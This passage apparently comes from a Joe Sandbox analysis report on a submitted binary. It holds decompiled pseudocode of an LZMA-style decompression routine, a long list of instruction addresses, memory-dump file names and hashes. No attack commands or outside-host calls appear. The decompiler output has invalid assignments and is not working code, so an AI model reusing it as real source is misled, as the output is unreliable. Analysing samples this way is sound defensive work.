												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004062eb
0x004062eb
0x004062ef
0x00406310
0x00406317
0x0040631d
0x00406323
0x00406335
0x0040633b
0x00406340
0x00000000
0x004062f1
0x004062f7
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x004062ef

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
